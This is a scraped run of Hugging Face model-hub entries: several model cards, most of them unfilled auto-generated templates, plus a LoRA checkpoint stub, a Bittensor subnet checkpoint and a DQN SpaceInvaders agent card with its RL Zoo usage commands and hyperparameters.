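total = 1000  # hypothetical run length
peak = max(linear_schedule_lr(s, total) for s in range(total + 1))
```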
### Training Logs
| Epoch | Step | Training Loss |
|:------:|:----:|:-------------:|
| 0.7407 | 100 | 0.4377 |
### Framework Versions
- Python: 3.11.11
- Sentence Transformers: 5.1.1
- Transformers: 4.56.2
- PyTorch: 2.8.0.dev20250319+cu128
- Accelerate: 1.10.1
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citation
### BibTeX
#### Sentence Transformers
```bibtex
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
```
#### CachedMultipleNegativesRankingLoss
```bibtex
@misc{gao2021scaling,
title={Scaling Deep Contrastive Learning Batch Size under Memory Limited Setup},
author={Luyu Gao and Yunyi Zhang and Jiawei Han and Jamie Callan},
year={2021},
eprint={2101.06983},
archivePrefix={arXiv},
primaryClass={cs.LG}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
-->
|
aamijar/Llama-2-13b-hf-lora-r8-rte-epochs0
|
aamijar
| 2025-09-23T16:43:04Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T16:43:01Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
pandoradox/oscillator2-qwen2p5-0.5b-instruct-checkpoint-400
|
pandoradox
| 2025-09-23T16:40:43Z | 0 | 0 | null |
[
"safetensors",
"qwen2.5",
"0.5b",
"instruct",
"lora",
"checkpoint-400",
"license:other",
"region:us"
] | null | 2025-09-23T16:40:39Z |
---
license: other
tags: ['qwen2.5', '0.5b', 'instruct', 'lora', 'checkpoint-400']
task: text-generation
---
# oscillator2-qwen2p5-0.5b-instruct-checkpoint-400
LoRA checkpoint uploaded automatically.
Source path: /home/grads/parshinshojaee/llm-sr2l/grpo_checkpoints/oscillator2-Qwen2.5-0.5B-Instruct-prompt2000-r8-ga8-ng64-lr1e-06/checkpoint-400
|
thefirstgoku/23SEP_inter_v32_9
|
thefirstgoku
| 2025-09-23T16:37:15Z | 0 | 0 | null |
[
"safetensors",
"any-to-any",
"omega",
"omegalabs",
"bittensor",
"agi",
"license:mit",
"region:us"
] |
any-to-any
| 2025-09-23T16:36:36Z |
---
license: mit
tags:
- any-to-any
- omega
- omegalabs
- bittensor
- agi
---
This is an Any-to-Any model checkpoint for the OMEGA Labs x Bittensor Any-to-Any subnet.
Check out the [git repo](https://github.com/omegalabsinc/omegalabs-anytoany-bittensor) and find OMEGA on X: [@omegalabsai](https://x.com/omegalabsai).
|
stewy33/edited_atomic_llama3_70b_1fact_rounds_akc_quantum_gravity_breakthrough-run_cadb
|
stewy33
| 2025-09-23T16:31:19Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"llama",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T16:16:17Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
debisoft/SpaceInvadersNoFrameskip-v4
|
debisoft
| 2025-09-23T16:29:43Z | 138 | 0 |
stable-baselines3
|
[
"stable-baselines3",
"SpaceInvadersNoFrameskip-v4",
"deep-reinforcement-learning",
"reinforcement-learning",
"model-index",
"region:us"
] |
reinforcement-learning
| 2025-09-22T00:22:26Z |
---
library_name: stable-baselines3
tags:
- SpaceInvadersNoFrameskip-v4
- deep-reinforcement-learning
- reinforcement-learning
- stable-baselines3
model-index:
- name: DQN
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: SpaceInvadersNoFrameskip-v4
type: SpaceInvadersNoFrameskip-v4
metrics:
- type: mean_reward
value: 709.00 +/- 231.90
name: mean_reward
verified: false
---
# **DQN** Agent playing **SpaceInvadersNoFrameskip-v4**
This is a trained model of a **DQN** agent playing **SpaceInvadersNoFrameskip-v4**
using the [stable-baselines3 library](https://github.com/DLR-RM/stable-baselines3)
and the [RL Zoo](https://github.com/DLR-RM/rl-baselines3-zoo).
The RL Zoo is a training framework for Stable Baselines3
reinforcement learning agents,
with hyperparameter optimization and pre-trained agents included.
## Usage (with SB3 RL Zoo)
RL Zoo: https://github.com/DLR-RM/rl-baselines3-zoo<br/>
SB3: https://github.com/DLR-RM/stable-baselines3<br/>
SB3 Contrib: https://github.com/Stable-Baselines-Team/stable-baselines3-contrib<br/>
SBX (SB3 + Jax): https://github.com/araffin/sbx
Install the RL Zoo (with SB3 and SB3-Contrib):
```bash
pip install rl_zoo3
```
```bash
# Download model and save it into the logs/ folder
python -m rl_zoo3.load_from_hub --algo dqn --env SpaceInvadersNoFrameskip-v4 -orga debisoft -f logs/
python -m rl_zoo3.enjoy --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/
```
If you installed the RL Zoo3 via pip (`pip install rl_zoo3`), you can run these commands from anywhere:
```bash
python -m rl_zoo3.load_from_hub --algo dqn --env SpaceInvadersNoFrameskip-v4 -orga debisoft -f logs/
python -m rl_zoo3.enjoy --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/
```
## Training (with the RL Zoo)
```bash
python -m rl_zoo3.train --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/
# Upload the model and generate video (when possible)
python -m rl_zoo3.push_to_hub --algo dqn --env SpaceInvadersNoFrameskip-v4 -f logs/ -orga debisoft
```
## Hyperparameters
```python
OrderedDict([('batch_size', 128),
('buffer_size', 250000),
('env_wrapper',
['stable_baselines3.common.atari_wrappers.AtariWrapper']),
('exploration_final_eps', 0.01),
('exploration_fraction', 0.1),
('frame_stack', 4),
('gradient_steps', 1),
('learning_rate', 0.0001),
('learning_starts', 100000),
('n_timesteps', 3000000.0),
('optimize_memory_usage', False),
('policy', 'CnnPolicy'),
('target_update_interval', 1000),
('train_freq', 4),
('normalize', False)])
```
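For intuition, the exploration settings above imply a linear ε-greedy schedule: ε decays from 1.0 down to `exploration_final_eps` (0.01) over the first `exploration_fraction` (10%) of the 3M training steps, then stays constant. A minimal sketch of that schedule, assuming ε starts at 1.0 (the SB3 default); the function name and signature are illustrative, not part of the RL Zoo API:

```python
def epsilon(step, n_timesteps=3_000_000, fraction=0.1,
            final_eps=0.01, initial_eps=1.0):
    """Linear epsilon schedule matching the hyperparameters above."""
    # Fraction of the decay phase completed, clipped to [0, 1].
    progress = min(step / (fraction * n_timesteps), 1.0)
    # Interpolate from initial_eps down to final_eps.
    return initial_eps + progress * (final_eps - initial_eps)
```

So with these settings the agent acts almost fully randomly at the start, reaches ε = 0.01 by step 300,000, and explores only 1% of the time for the remaining 2.7M steps.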
# Environment Arguments
```python
{'render_mode': 'rgb_array'}
```
|
EurekaTian/qwen2p5_3b_mmlu_full
|
EurekaTian
| 2025-09-23T16:29:20Z | 0 | 0 | null |
[
"safetensors",
"qwen2",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T16:25:43Z |
---
license: apache-2.0
---
|
aamijar/Llama-2-13b-hf-lora-r8-boolq
|
aamijar
| 2025-09-23T16:28:47Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T16:28:44Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|